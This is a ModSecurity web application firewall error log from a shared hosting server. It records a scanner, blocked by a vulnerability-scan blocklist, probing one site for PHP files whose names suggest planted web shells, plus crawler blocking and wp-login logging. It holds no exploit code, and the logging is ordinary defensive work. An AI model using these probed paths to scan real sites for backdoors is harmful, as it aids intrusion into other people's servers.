[Tue May 26 14:47:48.547807 2026] [security2:error] [pid 648203:tid 648399] [client 20.12.194.227:32026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.haddingtonwines.freshmindsolutions.com"] [uri "/about.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTqQAAAMc"]
[Tue May 26 14:47:48.547902 2026] [security2:error] [pid 648203:tid 648399] [client 20.12.194.227:32026] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.haddingtonwines.freshmindsolutions.com"] [uri "/about.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTqQAAAMc"]
[Tue May 26 14:47:48.581064 2026] [security2:error] [pid 648203:tid 648446] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTngAAAPY"]
[Tue May 26 14:47:48.714264 2026] [security2:error] [pid 648203:tid 648358] [client 4.201.75.230:23071] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/lang/es.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTtAAAAJ4"]
[Tue May 26 14:47:48.714384 2026] [security2:error] [pid 648203:tid 648358] [client 4.201.75.230:23071] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/lang/es.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTtAAAAJ4"]
[Tue May 26 14:47:48.875713 2026] [security2:error] [pid 648203:tid 648389] [client 4.201.75.230:2564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/lang/es.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTtQAAAL0"]
[Tue May 26 14:47:48.875821 2026] [security2:error] [pid 648203:tid 648389] [client 4.201.75.230:2564] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/lang/es.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTtQAAAL0"]
[Tue May 26 14:47:49.481537 2026] [security2:error] [pid 648203:tid 648417] [client 4.201.75.230:42224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/core/init.php"] [unique_id "ahVlPbEQDDtxJNiDrdTTxgAAANk"]
[Tue May 26 14:47:49.481659 2026] [security2:error] [pid 648203:tid 648417] [client 4.201.75.230:42224] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/core/init.php"] [unique_id "ahVlPbEQDDtxJNiDrdTTxgAAANk"]
[Tue May 26 14:47:49.640688 2026] [security2:error] [pid 648203:tid 648373] [client 4.201.75.230:41777] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/core/init.php"] [unique_id "ahVlPbEQDDtxJNiDrdTTywAAAK0"]
[Tue May 26 14:47:49.640795 2026] [security2:error] [pid 648203:tid 648373] [client 4.201.75.230:41777] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/core/init.php"] [unique_id "ahVlPbEQDDtxJNiDrdTTywAAAK0"]
[Tue May 26 14:47:49.667596 2026] [security2:error] [pid 648203:tid 648210] [remote 74.7.241.58:54320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVlPbEQDDtxJNiDrdTTzQAA6AY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/bn
[Tue May 26 14:47:49.732712 2026] [security2:error] [pid 648203:tid 648362] [client 114.119.136.14:42159] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mahehealthcare.com"] [uri "/wp-content/uploads/location.png"] [unique_id "ahVlPbEQDDtxJNiDrdTTzgAAAKI"], referer: https://mahehealthcare.com/wp-content/uploads/location.png
[Tue May 26 14:47:50.211206 2026] [security2:error] [pid 648203:tid 648343] [client 4.201.75.230:38198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/aa.php"] [unique_id "ahVlPrEQDDtxJNiDrdTT4wAAAI8"]
[Tue May 26 14:47:50.211314 2026] [security2:error] [pid 648203:tid 648343] [client 4.201.75.230:38198] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/aa.php"] [unique_id "ahVlPrEQDDtxJNiDrdTT4wAAAI8"]
[Tue May 26 14:47:50.539766 2026] [security2:error] [pid 648203:tid 648393] [client 4.201.75.230:41755] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/aa.php"] [unique_id "ahVlPrEQDDtxJNiDrdTT8AAAAME"]
[Tue May 26 14:47:50.539865 2026] [security2:error] [pid 648203:tid 648393] [client 4.201.75.230:41755] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/aa.php"] [unique_id "ahVlPrEQDDtxJNiDrdTT8AAAAME"]
[Tue May 26 14:47:50.660130 2026] [security2:error] [pid 648203:tid 648414] [client 65.111.4.249:26889] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlPbEQDDtxJNiDrdTTygAAANY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:50.743718 2026] [security2:error] [pid 648203:tid 648407] [client 4.201.75.230:28857] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/xmrlpc.php"] [unique_id "ahVlPrEQDDtxJNiDrdTT9AAAAM8"]
[Tue May 26 14:47:50.743823 2026] [security2:error] [pid 648203:tid 648407] [client 4.201.75.230:28857] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/xmrlpc.php"] [unique_id "ahVlPrEQDDtxJNiDrdTT9AAAAM8"]
[Tue May 26 14:47:51.168056 2026] [security2:error] [pid 648203:tid 648377] [client 4.201.75.230:31131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/xmrlpc.php"] [unique_id "ahVlP7EQDDtxJNiDrdTUCQAAALE"]
[Tue May 26 14:47:51.168152 2026] [security2:error] [pid 648203:tid 648377] [client 4.201.75.230:31131] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/xmrlpc.php"] [unique_id "ahVlP7EQDDtxJNiDrdTUCQAAALE"]
[Tue May 26 14:47:51.419180 2026] [security2:error] [pid 648203:tid 648344] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlPrEQDDtxJNiDrdTUAQAAAJA"]
[Tue May 26 14:47:51.467862 2026] [security2:error] [pid 648203:tid 648435] [client 4.201.75.230:32957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/class.php"] [unique_id "ahVlP7EQDDtxJNiDrdTUHQAAAOs"]
[Tue May 26 14:47:51.467957 2026] [security2:error] [pid 648203:tid 648435] [client 4.201.75.230:32957] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/class.php"] [unique_id "ahVlP7EQDDtxJNiDrdTUHQAAAOs"]
[Tue May 26 14:47:51.699935 2026] [security2:error] [pid 648203:tid 648368] [client 4.201.75.230:34275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/class.php"] [unique_id "ahVlP7EQDDtxJNiDrdTUJQAAAKg"]
[Tue May 26 14:47:51.700016 2026] [security2:error] [pid 648203:tid 648368] [client 4.201.75.230:34275] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/class.php"] [unique_id "ahVlP7EQDDtxJNiDrdTUJQAAAKg"]
[Tue May 26 14:47:52.225841 2026] [security2:error] [pid 648203:tid 648369] [client 4.201.75.230:35288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/goods.php"] [unique_id "ahVlQLEQDDtxJNiDrdTUMwAAAKk"]
[Tue May 26 14:47:52.225979 2026] [security2:error] [pid 648203:tid 648369] [client 4.201.75.230:35288] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/goods.php"] [unique_id "ahVlQLEQDDtxJNiDrdTUMwAAAKk"]
[Tue May 26 14:47:52.482430 2026] [security2:error] [pid 648203:tid 648415] [client 4.201.75.230:38184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/goods.php"] [unique_id "ahVlQLEQDDtxJNiDrdTUOAAAANc"]
[Tue May 26 14:47:52.482546 2026] [security2:error] [pid 648203:tid 648415] [client 4.201.75.230:38184] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/goods.php"] [unique_id "ahVlQLEQDDtxJNiDrdTUOAAAANc"]
[Tue May 26 14:47:52.786299 2026] [security2:error] [pid 648203:tid 648365] [client 4.201.75.230:35269] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/info.php"] [unique_id "ahVlQLEQDDtxJNiDrdTURAAAAKU"]
[Tue May 26 14:47:52.786450 2026] [security2:error] [pid 648203:tid 648365] [client 4.201.75.230:35269] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/info.php"] [unique_id "ahVlQLEQDDtxJNiDrdTURAAAAKU"]
[Tue May 26 14:47:52.930910 2026] [security2:error] [pid 648203:tid 648397] [client 104.207.52.207:46419] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlP7EQDDtxJNiDrdTUJgAAAMU"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:53.193189 2026] [security2:error] [pid 648203:tid 648374] [client 4.201.75.230:35325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/info.php"] [unique_id "ahVlQbEQDDtxJNiDrdTUTQAAAK4"]
[Tue May 26 14:47:53.193298 2026] [security2:error] [pid 648203:tid 648374] [client 4.201.75.230:35325] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/info.php"] [unique_id "ahVlQbEQDDtxJNiDrdTUTQAAAK4"]
[Tue May 26 14:47:53.695140 2026] [security2:error] [pid 648203:tid 648380] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlQbEQDDtxJNiDrdTUUAAAALQ"]
[Tue May 26 14:47:53.706217 2026] [security2:error] [pid 648203:tid 648432] [client 4.201.75.230:23050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/as.php"] [unique_id "ahVlQbEQDDtxJNiDrdTUXAAAAOg"]
[Tue May 26 14:47:53.706305 2026] [security2:error] [pid 648203:tid 648432] [client 4.201.75.230:23050] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/as.php"] [unique_id "ahVlQbEQDDtxJNiDrdTUXAAAAOg"]
[Tue May 26 14:47:53.890984 2026] [security2:error] [pid 648203:tid 648398] [client 4.201.75.230:32901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/as.php"] [unique_id "ahVlQbEQDDtxJNiDrdTUYAAAAMY"]
[Tue May 26 14:47:53.891079 2026] [security2:error] [pid 648203:tid 648398] [client 4.201.75.230:32901] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/as.php"] [unique_id "ahVlQbEQDDtxJNiDrdTUYAAAAMY"]
[Tue May 26 14:47:54.450400 2026] [security2:error] [pid 648203:tid 648441] [client 4.201.75.230:41771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/bb.php"] [unique_id "ahVlQrEQDDtxJNiDrdTUdQAAAPE"]
[Tue May 26 14:47:54.450526 2026] [security2:error] [pid 648203:tid 648441] [client 4.201.75.230:41771] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/bb.php"] [unique_id "ahVlQrEQDDtxJNiDrdTUdQAAAPE"]
[Tue May 26 14:47:54.673667 2026] [security2:error] [pid 648203:tid 648365] [client 4.201.75.230:34246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/bb.php"] [unique_id "ahVlQrEQDDtxJNiDrdTUewAAAKU"]
[Tue May 26 14:47:54.673789 2026] [security2:error] [pid 648203:tid 648365] [client 4.201.75.230:34246] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/bb.php"] [unique_id "ahVlQrEQDDtxJNiDrdTUewAAAKU"]
[Tue May 26 14:47:55.125726 2026] [security2:error] [pid 648203:tid 648424] [client 151.123.178.146:30591] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlQrEQDDtxJNiDrdTUbAAAAOA"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:55.187355 2026] [security2:error] [pid 648203:tid 648392] [client 4.201.75.230:28841] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/about.php"] [unique_id "ahVlQ7EQDDtxJNiDrdTUlAAAAMA"]
[Tue May 26 14:47:55.187492 2026] [security2:error] [pid 648203:tid 648392] [client 4.201.75.230:28841] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/about.php"] [unique_id "ahVlQ7EQDDtxJNiDrdTUlAAAAMA"]
[Tue May 26 14:47:55.286632 2026] [security2:error] [pid 648203:tid 648345] [client 4.201.75.230:34261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/about.php"] [unique_id "ahVlQ7EQDDtxJNiDrdTUnQAAAJE"]
[Tue May 26 14:47:55.286758 2026] [security2:error] [pid 648203:tid 648345] [client 4.201.75.230:34261] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/about.php"] [unique_id "ahVlQ7EQDDtxJNiDrdTUnQAAAJE"]
[Tue May 26 14:47:55.486577 2026] [security2:error] [pid 648203:tid 648455] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlQrEQDDtxJNiDrdTUiwAAAP8"]
[Tue May 26 14:47:55.695837 2026] [security2:error] [pid 648203:tid 648341] [client 4.201.75.230:34255] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/222.php"] [unique_id "ahVlQ7EQDDtxJNiDrdTUswAAAI0"]
[Tue May 26 14:47:55.695961 2026] [security2:error] [pid 648203:tid 648341] [client 4.201.75.230:34255] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/222.php"] [unique_id "ahVlQ7EQDDtxJNiDrdTUswAAAI0"]
[Tue May 26 14:47:55.771428 2026] [security2:error] [pid 648203:tid 648356] [client 32.199.252.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVlQ7EQDDtxJNiDrdTUtQAAAJw"]
[Tue May 26 14:47:55.771857 2026] [security2:error] [pid 648203:tid 648358] [client 32.199.252.220:50858] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVlQ7EQDDtxJNiDrdTUrwAAAJ4"]
[Tue May 26 14:47:55.976753 2026] [security2:error] [pid 648203:tid 648352] [client 4.201.75.230:2267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/222.php"] [unique_id "ahVlQ7EQDDtxJNiDrdTUvwAAAJg"]
[Tue May 26 14:47:55.976873 2026] [security2:error] [pid 648203:tid 648352] [client 4.201.75.230:2267] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/222.php"] [unique_id "ahVlQ7EQDDtxJNiDrdTUvwAAAJg"]
[Tue May 26 14:47:56.178574 2026] [security2:error] [pid 648203:tid 648398] [client 4.201.75.230:34262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/test1.php"] [unique_id "ahVlRLEQDDtxJNiDrdTUygAAAMY"]
[Tue May 26 14:47:56.178699 2026] [security2:error] [pid 648203:tid 648398] [client 4.201.75.230:34262] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/test1.php"] [unique_id "ahVlRLEQDDtxJNiDrdTUygAAAMY"]
[Tue May 26 14:47:56.738181 2026] [security2:error] [pid 648203:tid 648415] [client 4.201.75.230:42233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/test1.php"] [unique_id "ahVlRLEQDDtxJNiDrdTU4AAAANc"]
[Tue May 26 14:47:56.738304 2026] [security2:error] [pid 648203:tid 648415] [client 4.201.75.230:42233] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/test1.php"] [unique_id "ahVlRLEQDDtxJNiDrdTU4AAAANc"]
[Tue May 26 14:47:57.111574 2026] [security2:error] [pid 648203:tid 648389] [client 4.201.75.230:42197] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp-mail.php"] [unique_id "ahVlRbEQDDtxJNiDrdTU5gAAAL0"]
